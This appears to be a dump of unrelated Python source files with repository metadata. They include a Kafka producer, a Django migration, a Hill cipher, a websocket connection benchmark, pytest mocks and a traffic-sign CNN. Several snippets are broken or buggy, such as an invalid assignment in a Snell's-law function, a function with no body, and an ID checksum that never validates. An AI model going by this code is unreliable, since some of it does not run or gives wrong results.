def __init__(self,bootstrapServers,topicName):
self.bootstrapServers = bootstrapServers
self.topicName = topicName
def readFile(self,filePath,indexRow = 0,secondsToAdd = 0):
producer = KafkaProducer(bootstrap_servers=self.bootstrapServers)
index = 0
with open(filePath, 'r',) as csvfile:
#reader =csv.reader(csvfile,delimiter = ",")
fieldNames = ["house_id","household_id","eventtimestamp","value","timestamp"]
reader = csv.DictReader(csvfile, fieldNames,delimiter = ",")
next(reader)
for row in reader:
if index >= indexRow:
ts = (np.int(row["eventtimestamp"]) + secondsToAdd) #np.int(row["timestamp"])
row["timestamp"] = ts
ts = ts * 1000
key = row["house_id"].encode('utf-8')
value =json.dumps(row).encode('utf-8')
pdb.set_trace()
producer.send(self.topicName,value = value,key = key,timestamp_ms = ts)
if index %1000 == 0:
print("Index %i" % index)
#time.sleep(.001)
index = index + 1
def createTopic(self,brokers,topicName):
client = KafkaClient(brokers)
client.ensure_topic_exists(topic=topicName)
brokerList = ["10.0.0.9","10.0.0.4","10.0.0.7"]
file = "F:\Sid\Learnings\Data Scientist\Analytics Vidhya\Sapient Challenge\household.csv"
topicName = "rawevents"
eventGen = EventGenerator(brokerList,topicName)
#eventGen.createTopic(brokerList,topicName)
"""
difference between Timestamp for 2018-07-10 09:19:09.607 and
max timestamp (1380578340) in data is 150636009
"""
secondsToAdd = 150635894
eventGen.readFile(file,indexRow=0,secondsToAdd=secondsToAdd)
"""
import csv
file = "F:\Sid\Learnings\Data Scientist\Analytics Vidhya\Sapient Challenge\dummy.csv"
with open(file) as csvfile:
reader = csv.reader(csvfile,delimiter = "\t")
for row in reader:
print(",".join(row[1:]))
"""
|
[
"siddharth.tandon1@gmail.com"
] |
siddharth.tandon1@gmail.com
|
6ec103878eced29e866f07f54b7c8de32b53129b
|
311291c4c0a6bb74827ecf019dde46d145013ec8
|
/find_stable_points.py
|
5a4f6f499f30f7d6b21a99ecf781075dcb872d00
|
[] |
no_license
|
goedel-gang/bifurcation_logistic_map
|
bd6361a8cbb1123d2293be37ab8b492d06db6c9a
|
aa37c9794ad830004de318c9b1f72c3c9929586e
|
refs/heads/master
| 2020-05-03T09:37:08.088101
| 2019-06-26T08:59:51
| 2019-06-26T08:59:51
| 178,559,017
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 536
|
py
|
import decimal
from time import sleep
def logi_map(x_n, r):
return r * x_n * (1 - x_n)
def stable_points(prec, f):
decimal.getcontext().prec = prec
x = decimal.Decimal(0.5)
seen = set()
while x not in seen:
seen.add(x)
x = f(x)
endpoint = x
x = f(x)
osc = [x]
while x != endpoint:
x = f(x)
osc.append(x)
return osc
if __name__ == "__main__":
for r in range(24, 35):
print(0.1 * r, stable_points(6, lambda x: logi_map(x, decimal.Decimal(0.1 * r))))
|
[
"izaak.van.dongen@gmail.com"
] |
izaak.van.dongen@gmail.com
|
8298294ab318bf5052e57b1984a626a4f03e7664
|
69591ed61e4414680de0c1cf574e175692d89301
|
/Practica4/datamodel/migrations/0001_initial.py
|
8c8739906a459c5092e9726316f922f733fff2ee
|
[] |
no_license
|
andressp05/InformationSystems-Project
|
52de1f44643c7af82d4177f63d3433d3c026b427
|
96af93ca8222bd69ee8faa320c200825bf0bc2e6
|
refs/heads/master
| 2022-04-10T13:12:24.199998
| 2020-03-26T17:51:21
| 2020-03-26T17:51:21
| 250,321,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,227
|
py
|
# Generated by Django 2.2.6 on 2019-11-26 00:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Counter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.IntegerField(null=True)),
],
),
migrations.CreateModel(
name='Game',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cat1', models.IntegerField(default=0)),
('cat2', models.IntegerField(default=2)),
('cat3', models.IntegerField(default=4)),
('cat4', models.IntegerField(default=6)),
('mouse', models.IntegerField(default=59)),
('cat_turn', models.BooleanField(default=True)),
('status', models.IntegerField(default=0)),
('cat_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='games_as_cat', to=settings.AUTH_USER_MODEL)),
('mouse_user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='games_as_mouse', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Move',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('origin', models.IntegerField()),
('target', models.IntegerField()),
('date', models.DateField(default='2019-11-26')),
('game', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='moves', to='datamodel.Game')),
('player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"andres.salas@estudiante.uam.es"
] |
andres.salas@estudiante.uam.es
|
0535495967d0332e764b0470f019bcb21263c717
|
e6b3a576d8c8bc79aa6d85aeb56f655553d36a3c
|
/Game_over.py
|
c40f0da50b054021a072328aedf3e24aaf35de5d
|
[] |
no_license
|
Lehsey/Game_antology_on_minimal
|
1d7e85c558614674e347d53f853d6e17e034fda8
|
e7f7efa08edcc0f90c6fd81b1792f5714db89aaa
|
refs/heads/master
| 2020-08-29T11:29:11.069314
| 2019-11-21T14:52:40
| 2019-11-21T14:52:40
| 218,019,012
| 0
| 1
| null | 2019-11-01T11:25:53
| 2019-10-28T10:14:14
|
Python
|
UTF-8
|
Python
| false
| false
| 2,100
|
py
|
from PyQt5 import QtWidgets as widget
import Records
class GameOver(widget.QWidget):
def __init__(self, game, rec):
super().__init__()
# инициализация
self.game_name = game
self.rec = rec
self.setupUI()
def setupUI(self):
self.setWindowTitle('Game Over!')
#установка интерфейса
self.setupInputName()
self.setupButtons()
self.setupGrid()
self.setFixedSize(self.sizeHint())
def setupInputName(self):
self.input_name_text = widget.QLabel('Введите имя:', self)
self.input_name = widget.QLineEdit(self)
def setupButtons(self):
self.set_record = widget.QPushButton('Продолжить')
self.set_record.clicked.connect(self.setRecord)
self.cancel_button = widget.QPushButton('Отмена')
self.cancel_button.clicked.connect(self.close)
def setupGrid(self):
self.grid = widget.QVBoxLayout(self)
self.input_name_frame = widget.QWidget(self)
self.input_name_layout = widget.QHBoxLayout(self.input_name_frame)
self.input_name_layout.addWidget(self.input_name_text, 0)
self.input_name_layout.addWidget(self.input_name, 1)
self.buttons_frame = widget.QWidget(self)
self.buttons_layout = widget.QHBoxLayout(self.buttons_frame)
self.buttons_layout.addWidget(self.set_record)
self.buttons_layout.addWidget(self.cancel_button)
self.grid.addWidget(self.input_name_frame)
self.grid.addWidget(self.buttons_frame)
self.setLayout(self.grid)
def setRecord(self):
#запись рекорда в зависимости от игры
if self.game_name == "Змейка":
Records.set_rec(
self.game_name, self.input_name.text(), self.rec)
elif self.game_name == 'Ним':
Records.set_rec(
self.game_name, self.input_name.text(), self.rec)
self.hide()
|
[
"noreply@github.com"
] |
noreply@github.com
|
ee987387848f8cbe5c0ca7f34274b86608007c54
|
1abb8c4fed56b90f1820e68ee398dc4999a812e5
|
/Understandings/next.py
|
a30f43bf333dd37c43feeaff3b7d9773cc72b25b
|
[] |
no_license
|
tymurKoltunov/raspberryPI_foundation
|
de9b5355430556c6918fa498aa3ac4c23db64cd4
|
76020727c94139b5c5f46db410d03fd720320574
|
refs/heads/master
| 2022-09-18T01:02:09.488608
| 2020-06-04T03:52:47
| 2020-06-04T03:52:47
| 257,062,904
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 141
|
py
|
def countdown():
n = 4
while (n > 0):
yield n
n -= 1
c = countdown()
print(f"{c} + '1'")
print(f"{next(c)} + '2'")
|
[
"tymur.koltunov@nure.ua"
] |
tymur.koltunov@nure.ua
|
39d1f1d061ba1a605ac99d665358afaa10fee6bb
|
ef61ee0178686a1e371836188f97ad982e4123b8
|
/local/data/data_prep_TOCFL.py
|
fe59ef09a6176dd50c8e124f41dc8429b5647335
|
[] |
no_license
|
xiaoyeye1117/Chinese-ASR
|
17c138631da723a7163e00aca7ca2e34103f800f
|
be93ee6ab42f39e0f9c69b52b6acb4ec261ad4c9
|
refs/heads/master
| 2020-06-23T07:36:17.846508
| 2019-01-21T07:35:30
| 2019-01-21T07:35:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,015
|
py
|
import os,sys
def main(tocfl_path,file_type):
wavdir_path = os.path.join(tocfl_path,'wav')
wavdir_path = os.path.abspath(wavdir_path)
txt_path = os.path.join(tocfl_path,'txt')
for filename in os.listdir(wavdir_path):
wav_label = filename.split('.')[0]
wav_path = os.path.join(wavdir_path,filename)
txt_file = os.path.join(txt_path,wav_label+'.txt')
txt = open(txt_file,'r',encoding='UTF-8').read()
trans = txt.rstrip()
#trans = ' '.join(list(trans))
if file_type == 'text':
sys.path.append('local/data/tool/jieba-zh_TW')
import jieba
trans = ' '.join(jieba.cut(trans))
trans = trans.upper()
print(wav_label,trans)
elif file_type == 'wav.scp':
print(wav_label,wav_path)
elif file_type == 'utt2spk':
print(wav_label, wav_label)
if __name__ == '__main__':
tocfl_path = sys.argv[1]
file_type = sys.argv[2]
main(tocfl_path,file_type)
|
[
"jacky84228@hotmail.com"
] |
jacky84228@hotmail.com
|
9e1b09e46ad8b3cb9a2629079e9ecbfc3da05a97
|
968b33e7931bbbf32cfb8e7a7a9f7654778b3577
|
/prob 101~130/prob 129.py
|
c697ef406f1de7defed6f216dfeaff993ff23365
|
[] |
no_license
|
hoki1678/2020_Programming
|
f5ac77f07baad0fa7c231a224c546cc4e3231080
|
5778c340411d20cdc92c9a45eea14b4960b9ed0e
|
refs/heads/master
| 2022-11-22T21:24:05.468796
| 2020-07-25T02:55:19
| 2020-07-25T02:55:19
| 256,646,258
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
#129
a=input("주민등록번호를 입력하세요.: ")
b=(int(a[0])*2 + int(a[1])*3 + int(a[2])*4 + int(a[3])*5 + int(a[4])*6 + int(a[5])*7 + int(a[7])*8 + int(a[8])*9 + int(a[9])*2 + int(a[10])*3 + int(a[11])*4 + int(a[12])*5)
c=b%11
if c == a[13:]:
print("유효한 주민등록번호입니다.")
else:
print("유효하지 않은 주민등록번호입니다.")
|
[
"noreply@github.com"
] |
noreply@github.com
|
ea7fc7390b542d4dfea40144a9c5c6705e0968ac
|
6fc7ad0675e0ce0b4e08beb4d66709d4ab2a6c18
|
/Python代码/慕课网Python高级课程/chapter02-魔法函数/1.py
|
784ea91ab2f8c5b5f800484937308c92bca5785d
|
[] |
no_license
|
Nelocage/algorithm
|
81a6b733d158ba8df804f62b10bb08dbb7de591f
|
7957ded5dd68e145aa152eb05c6b221192942bf2
|
refs/heads/master
| 2020-03-27T11:12:17.893149
| 2018-09-08T14:59:19
| 2018-09-08T14:59:19
| 146,463,239
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,104
|
py
|
#魔法函数就是以双下划线开头,双下划线结尾的函数
#for函数会拿到一个迭代器,会优先查找类的__iter__方法,若没有则有getitem方法也可以,魔法函数有多个代替品,程序需要实现某些魔法函数时
#会在多个魔法函数中查找, 实现任意一个即可
# 实现魔法函数可以增加自定义类的特性,魔法函数会影响到使用Python的语法
# 学习切片操作
#魔法函数与Python从哪个类继承没有关系
class magic():
#常见魔法函数
#字符串表示
def __repr__(self):
pass
def __str__(self):
pass
#集合,序列相关
def __len__(self):
pass
def __getitem__(self, item):
pass
def __setitem__(self, key, value):
pass
def __delitem__(self, key):
pass
def __contains__(self, item):
pass
#迭代相关
def __iter__(self):
pass
def __next__(self):
pass
#可调用
def __call__(self, *args, **kwargs):
pass
#with上下文管理器
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
#数值转换
def __abs__(self):
pass
def __bool__(self):
pass
def __int__(self):
pass
def __float__(self):
pass
def __hash__(self):
pass
#元类相关
def __new__(cls, *args, **kwargs):
pass
def __init__(self):
pass
#属性相关
def __getattr__(self, item):
pass
def __setattr__(self, key, value):
pass
def __getattribute__(self, item):
pass
#def __setattribute__:
pass
def __dir__(self):
pass
#属性描述符
def __get__(self, instance, owner):
pass
def __set__(self, instance, value):
pass
def __delete__(self, instance):
pass
#协程相关
def __await__(self):
pass
def __aiter__(self):
pass
def __anext__(self):
pass
def __aexit__(self, exc_type, exc_val, exc_tb):
pass
def __aenter__(self):
pass
|
[
"1784809727@qq.com"
] |
1784809727@qq.com
|
2ab57e0a422988c3ab9c0a083d6d0b87670ebc16
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_116/ch117_2020_03_23_21_27_19_174351.py
|
cc5e23b34f33ab76256d64d25a4ac3b24699c59a
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 98
|
py
|
from math import sin
def snell_descartes(n1,n2,θ1):
sin(θ2)=n1*(sin(θ1))/n2
return θ2
|
[
"you@example.com"
] |
you@example.com
|
4e4e1e1d0d5c76f9f06d146612d2ea99485180ea
|
1f212c57147e2f02471cd0f258108e2128af52b8
|
/HillChiper.py
|
9e1827fcd20fcd139141f32883551f53d03d11e3
|
[] |
no_license
|
sinamustopa1/HillCipher
|
0f0a59b66594d372751108d675e9579d4ad9c668
|
f4ae371f4f1663108414bb910c227a07ec81744e
|
refs/heads/master
| 2022-12-19T19:49:06.025597
| 2020-09-28T12:25:31
| 2020-09-28T12:25:31
| 299,298,962
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,294
|
py
|
# 140810180009 Naufal Ariful Amri
# 140810180011 Alfari Sidnan
# 140810180017 Sina Mustopa
import numpy as np
key_matrix = [[0] * 2 for t in range(2)]
key_mat = [[0] * 2 for t in range(2)]
chiper_text = [[0] * 2 for t in range(2)]
plain_text = [[0] * 2 for t in range(2)]
numbertext = [[0] for t in range(2)]
plaintext = [[0] for t in range(2)]
chipertext = [[0] for t in range(2)]
# Mengubah char kunci menjadi angka
def getKeyNumber(key):
k = 0
for i in range (2):
for j in range(2):
key_matrix[i][j] = ord(key[k]) - 65
k += 1
return key_matrix
# Mengubah char chipertext menjadi angka
def getChNumber(key):
k = 0
for i in range (2):
for j in range(2):
chiper_text[i][j] = ord(key[k]) - 65
k += 1
return chiper_text
# Mengubah char plaintext menjadi angka
def getPlNumber(key):
k = 0
for i in range (2):
for j in range(2):
plain_text[i][j] = ord(key[k]) - 65
k += 1
return plain_text
# enkripsi
def encrypt(text,key):
for i in range(2):
plaintext[i] = ord(text[i]) - 65
#melakukan rumus dari C = K * P
for i in range(2):
value = 0
for j in range(2):
value = value + key_matrix[i][j] * plaintext[j]
numbertext[i] = value % 26
#dekripsi
def decrypt(text,key):
#mencari GCD dari key matrix
temp = np.linalg.det(key_matrix)
a = round(temp) % 26
b = 26
x,y, t1,t0 = 0,1, 1,0
while a != 0:
q, r = b//a , b%a
m, n = x-t1*q , y-t0 * q
b,a , x,y , t1,t0 = a,r ,t1,t0 , m,n
gcd = x % 26
t = np.linalg.inv(key_matrix) * temp * gcd
tek = np.round(t)
y = tek.astype(int)
for i in range(2):
chipertext[i] = ord(text[i]) - 65
#Melakukan rumus P = K^-1 * c
for i in range(2):
value = 0
for j in range(2):
value = value + y[i][j] * chipertext[j]
numbertext[i] = value % 26
def keyFunction(pl,ch):
#mengubah Chiper dan Plaintext menjadi angka
plain = getPlNumber(pl)
chiper = getChNumber(ch)
#mencari determinan plain dan chiper
temp = np.linalg.det(chiper)
temp1 = np.linalg.det(plain)
#mencari gcd dari chiper text
a = round(temp)
b = 26
x,y, t1,t0 = 0,1, 1,0
while a != 0:
q, r = b//a , b%a
m, n = x-t1*q , y-t0 * q
b,a , x,y , t1,t0 = a,r ,t1,t0 , m,n
gcd = x % 26
#mencari plain invers dengan cara P^-1 = adj(P) * det^1(C)
plain_invers = np.mod(np.linalg.inv(plain) * -temp1 * gcd, 26)
keey = np.dot(plain_invers,chiper)
y = np.round(np.mod(keey,26))
return y.astype(int)
def hillchiper(text, key, number):
getKeyNumber(key)
if number == 1:
encrypt(text,key)
for i in range (2):
chipertext[i] = chr(numbertext[i] + 65)
return chipertext
elif number == 2:
decrypt(text,key)
for i in range (2):
plaintext[i] = chr(numbertext[i] + 65)
return plaintext
else:
temp = keyFunction(text,key)
for i in range(2) :
for j in range(2):
key_mat[j][i] = chr(temp[i][j] + 65)
return key_mat
def main():
message = "FR"
message1 = "FRPQ"
pl = "FRID"
ch = "PQCF"
key = "HITD"
print('\nMessage : ' , message)
print('key : ' , key)
print ('Encrypt : ' , hillchiper(message,key,1))
print('\nMessage : ' , message1)
print('key : ' , key)
print ('Decrypt : ' , hillchiper(message1,key,2))
print('\nChiper : ' , message)
print('Plain: ' , message1)
print ('Key : ' , hillchiper(pl,ch,3))
if __name__ == "__main__":
main()
|
[
"mustopa.sina@gmail.com"
] |
mustopa.sina@gmail.com
|
f8ace194fe1d0bc32f6bd45242ff8b34795f06b7
|
e8ebf7028f03aee9794096693a09ddfd52c0b1cf
|
/TFDatabase/dataframe_controller.py
|
2b3fbe6411fa4b78707da895e739f79417ad8d6c
|
[] |
no_license
|
dagleaves/Miscellaneous
|
752159d231476e4186dedb971bed42bc9ce0cad4
|
a3742e366b51777a588a6dfbfad735fa8c656d89
|
refs/heads/main
| 2023-02-18T16:08:19.221525
| 2021-01-14T00:53:34
| 2021-01-14T00:53:34
| 302,792,451
| 0
| 0
| null | 2020-12-03T15:49:04
| 2020-10-10T01:54:20
|
Java
|
UTF-8
|
Python
| false
| false
| 269
|
py
|
import pandas as pd
try:
database = pd.read_csv('database.csv')
except FileNotFoundError:
response = input('File not found! Download database? (y/n)')
if response == '' or response.lower() == 'y':
pass
# Download database
def search(toy):
|
[
"68761152+dagleaves@users.noreply.github.com"
] |
68761152+dagleaves@users.noreply.github.com
|
382ec61b5d92e38174ded2840080940b3653dd40
|
d72505a7961bf7f96094a6c7013f3c794495044b
|
/client.py
|
4856fbb4f78c0f80314f35362b41858153512a26
|
[] |
no_license
|
520hacker/websocket-connetions-benchmark
|
fa6ce757ec9cd68c5bcd60a5421700af6ae4814b
|
af609d775742cfeca5714133cddea32c8b0c51c0
|
refs/heads/master
| 2020-06-05T19:20:43.277616
| 2019-02-13T08:08:55
| 2019-02-13T08:08:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,821
|
py
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# debug in python 3.6
#__author__ == 'ipcpu'
import websocket
import time
import threading
import json
import multiprocessing
from threadpool import ThreadPool, makeRequests
#修改成自己的websocket地址
WS_URL = "ws://10.140.12.45:8888/"
#定义进程数
processes=5
#定义线程数(每个文件可能限制1024个,可以修改fs.file等参数)
thread_num=5000
def on_message(ws, message):
print(message)
pass
def on_error(ws, error):
print(error)
pass
def on_close(ws):
print("### closed ###")
pass
def on_open(ws):
def send_trhead():
#设置你websocket的内容
send_info = {"cmd": "refresh", "data": {"room_id": "58", "wx_user_id": 56431}}
#每隔10秒发送一下数据使链接不中断
while True:
time.sleep(10)
ws.send(json.dumps(send_info))
t = threading.Thread(target=send_trhead)
t.start()
def on_start(num):
time.sleep(num%20)
websocket.enableTrace(True)
ws = websocket.WebSocketApp(WS_URL + str(num),
on_message=on_message,
on_error=on_error,
on_close=on_close)
ws.on_open = on_open
ws.run_forever()
def thread_web_socket():
#线程池
pool = ThreadPool(thread_num)
num = list()
#设置开启线程的数量
for ir in range(thread_num):
num.append(ir)
requests = makeRequests(on_start, num)
[pool.putRequest(req) for req in requests]
pool.wait()
if __name__ == "__main__":
#进程池
pool = multiprocessing.Pool(processes=processes)
#设置开启进程的数量
for i in range(processes):
pool.apply_async(thread_web_socket)
pool.close()
pool.join()
|
[
"you@example.com"
] |
you@example.com
|
b9285e56da882aaf22b415ed18ff86510bae43ee
|
3d4b7cc6b3117b40a4f388fa4e704abaa6001ce8
|
/readframe.py
|
386bc54cc4eefcaed3b077b2609b6d9a5e056a35
|
[] |
no_license
|
ald2004/pedestrian_track
|
3e5de1c68d811016413fefa09e2c0634bb2ca82e
|
f2d550e99a9c14a7485b9ccd2a4a2986993dc10a
|
refs/heads/master
| 2023-02-11T01:09:23.674210
| 2020-12-30T12:40:02
| 2020-12-30T12:40:02
| 318,141,401
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 565
|
py
|
import cv2
import time
cap = cv2.VideoCapture(0)
if not (cap.isOpened()):
print("Could not open video device")
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
while 1:
ret, frame = cap.read()
success, buffer = cv2.imencode(".jpg", frame)
buffer.tofile('video_feed1')
# with open('video_feed1', 'wb') as fid:
# cv2.imwrite(fid, frame)
# cv2.imshow('preview',frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
time.sleep(.5)
cap.release()
cv2.destroyAllWindows()
|
[
"yuanpu@139.com"
] |
yuanpu@139.com
|
a64e2e09dd7b30e5f219fc94a7b62eca86a430aa
|
b24492f688e59a72e30fb0504133d2e260aa88bf
|
/011_blackjack/angela_blackJack.py
|
bfcd91de5fe6ed22904b14b1d26c5a2b17c167ec
|
[] |
no_license
|
zenvin/100DaysOfCode
|
632da387a8f1022508091eecb8c07591b5219564
|
885c8833a3d56d9b6da05f0dc601aa4a00089742
|
refs/heads/main
| 2023-06-04T02:12:46.639881
| 2021-06-23T05:27:54
| 2021-06-23T05:27:54
| 369,921,097
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,215
|
py
|
import random
import os
from art import logo
def deal_card():
"""Returns a randomc card from the deck"""
cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]
card = random.choice(cards)
return card
def calculate_score(cards):
"""Take a list of cards and return a score for those cards"""
#instead of if 11 in cards and 10 in cards; just do 21
if sum(cards) == 21 and len(cards) == 2:
return 0
if 11 in cards and sum(cards) > 21:
cards.remove(11)
cards.append(1)
return sum(cards)
def compare(user_score, computer_score):
if user_score == computer_score:
return "Draw 😊"
elif computer_score == 0:
return "Lose, opponent has Blackjack 😢"
elif user_score == 0:
return "Win with a Blackjack 😎"
elif user_score > 21:
return "You went over. You lose."
elif computer_score > 21:
return "Opponent went over. You win. 😁"
elif user_score > computer_score:
return "You win 😄"
else:
return "You lose 😤"
def play_game():
print(logo)
user_cards = []
computer_cards = []
is_game_over = False
for _ in range(2):
user_cards.append(deal_card()) #combine lines 15 and 16
# new_card = deal_card()
# user_cards.append(new_card) #adds a single item
computer_cards.append(deal_card())
while not is_game_over:
user_score = calculate_score(user_cards)
computer_score = calculate_score(computer_cards)
print(f" Your cards: {user_cards}, current score: {user_score}")
print(f" Computer's first card: {computer_cards[0]}")
if user_score == 0 or computer_score == 0 or user_score > 21:
is_game_over = True
else:
user_should_deal = input("Type 'y' to get another card, type 'n' to pass: ")
if user_should_deal == 'y':
user_cards.append(deal_card())
else:
is_game_over = True
while computer_score != 0 and computer_score < 17:
computer_cards.append(deal_card())
computer_score = calculate_score(computer_cards)
print(f" Your final hand: {user_cards}, final score: {user_score}.")
print(f" Computer's final hand: {computer_cards}, final score: {computer_score}.")
print(compare(user_score, computer_score))
while input("Do you want to play a game of Black Jack? Type 'y' or 'n': ") == 'y':
os.system('cls')
play_game()
|
[
"zevin@protonmail.com"
] |
zevin@protonmail.com
|
b3bd6d7c6319d309c4fab6cf10a4e82d95fae6f3
|
f3e0663824268443985685538c972f94e86fe97f
|
/globus_contents_manager/tests/unit/tests.py
|
5ded953695041917c612978f7912f5c9a561acf7
|
[
"Apache-2.0"
] |
permissive
|
rpwagner/globus-contents-manager
|
370bf7b56eee968794028a52bbde27206f28684c
|
40ad5e8ef97686feff4ae36ff0f71b0c600c3e83
|
refs/heads/master
| 2020-08-13T02:05:46.821373
| 2019-08-19T16:55:07
| 2019-08-19T16:55:07
| 214,887,611
| 0
| 0
|
Apache-2.0
| 2019-10-13T20:17:27
| 2019-10-13T20:17:27
| null |
UTF-8
|
Python
| false
| false
| 2,439
|
py
|
from unittest.mock import Mock
import pytest
import globus_sdk
# from .mocks import GlobusTransferTaskResponse
from . import testfuncs
class MockGlobusResponse:
"""Mimics the GlobusSDK Response object"""
data = {}
@pytest.fixture
def mock_ls_response():
"""Mock an operation_ls response to return the following data."""
r = MockGlobusResponse()
r.data = {'DATA': [{'name': 'foo.txt'}, {'name': 'bar.txt'}]}
return r
@pytest.fixture
def mock_operation_ls(monkeypatch, mock_ls_response):
"""Mock the globus_sdk directly, so anything that calls
TransferClient.operation_ls() is mocked with a mock_ls_response. NOTE! This
will not work for any modules that do
'from globus_sdk import TransferClient'. This is because the module will
import the class before we mock it."""
mock_transfer_instance = Mock()
mock_transfer_instance.operation_ls.return_value = mock_ls_response
mock_transfer_class = Mock(return_value=mock_transfer_instance)
monkeypatch.setattr(globus_sdk, 'TransferClient', mock_transfer_class)
return mock_operation_ls
@pytest.fixture
def mock_get_transfer_client(monkeypatch, mock_ls_response):
"""Mocking the 'get_transfer_client' function"""
mock_transfer_instance = Mock()
mock_transfer_instance.operation_ls.return_value = mock_ls_response
mock_get_tc = Mock(return_value=mock_transfer_instance)
monkeypatch.setattr(testfuncs, 'get_transfer_client', mock_get_tc)
return mock_operation_ls
def test_make_directory(mock_get_transfer_client):
"""Testing the creation of a new directory (using operation_mkdir)"""
response_str = testfuncs.make_directory()
assert response_str == "Success"
def test_rename(mock_get_transfer_client):
"""Testing the rename operation (operation_rename)"""
response_str = testfuncs.rename()
assert response_str == "Success"
def test_count_files(mock_operation_ls):
output = testfuncs.count_files()
assert output == 2
def test_count_files_again(mock_get_transfer_client):
output = testfuncs.count_files()
assert output == 2
def test_dir_exists():
dirs = testfuncs.get_dir_names()
assert 'shared_dir' in dirs
def test_file_exists():
files = testfuncs.get_file_names()
assert 'file1.txt' in files
def get(mock_get_transfer_client):
pass
def save(mock_get_transfer_client):
pass
def delete_file(mock_get_transfer_client):
pass
|
[
"netta.en@gmail.com"
] |
netta.en@gmail.com
|
139fc43ea6710f50dbe6f5a4640851fdeeae124a
|
a86db906f3acb78a8921814ab295265bc98c4a73
|
/BackEnd/ObjectRecognition/trafficsignnet.py
|
b5ff088721f28614fac2ee38789b07d003fdfee2
|
[] |
no_license
|
filipbozic00/Traffic-analizer
|
f431250e8adeb1eda645ee1579bc5f3bf29a6a8b
|
53a08c45a857db01f0b4c28412d92c8ce2616776
|
refs/heads/master
| 2023-06-25T03:02:44.199759
| 2021-07-20T13:40:13
| 2021-07-20T13:40:13
| 387,800,728
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,674
|
py
|
import cv2
from imutils.convenience import resize
from matplotlib import pyplot as plt
import numpy as np
import imutils
import pytesseract as tess
import tensorflow
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import BatchNormalization
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import MaxPooling2D
from tensorflow.keras.layers import Activation
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Dropout
from tensorflow.keras.layers import Dense
from tensorflow.python.keras.layers.convolutional import Conv
tess.pytesseract.tesseract_cmd = r'C:\Program Files\Tesseract-OCR\tesseract.exe'
class TrafficSignNet:
@staticmethod
#image dimension, depth and number of classes in the dataset
def build(width, height, depth, classes):
# initialize the model along with the input shape to be
# "channels last" and the channels dimension itself
model = Sequential()
inputShape = (height, width, depth)
chanDim = -1
# CONV => RELU => BN => POOL
model.add(Conv2D(8, (5,5), padding="same", input_shape=inputShape))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(MaxPooling2D(pool_size=(2,2)))
# first set of (CONV => RELU => CONV => RELU) * 2 => POOL
model.add(Conv2D(16, (3,3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(Conv2D(16, (3,3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(MaxPooling2D(pool_size=(2,2)))
# second set of (CONV => RELU => CONV => RELU) * 2 => POOL
model.add(Conv2D(32, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(Conv2D(32, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation("relu"))
model.add(BatchNormalization())
model.add(Dropout(0.5))
# second set of FC => RELU layers
model.add(Flatten())
model.add(Dense(128))
model.add(Activation("relu"))
model.add(BatchNormalization())
model.add(Dropout(0.5))
#softmax classifier
model.add(Dense(classes))
model.add(Activation("softmax"))
#return the constructed network architecture
return model
|
[
"filip.bozic@student.um.si"
] |
filip.bozic@student.um.si
|
bc7e20b9311d255c3353f7a015de56cb7971e407
|
9ab27d9f29d924937223842d2f9beebf7a669107
|
/AbilityScoreAndClassMashineLearning.py
|
9f0b8af1ce6a26cefab25559a7f494e97b62fc79
|
[] |
no_license
|
Micniks/Python-Exam
|
c21749b7cfbb6635ffb78e9a808c80bda0b6530d
|
24cbf96762c3e654ea865c32603330db5fbdc4c2
|
refs/heads/main
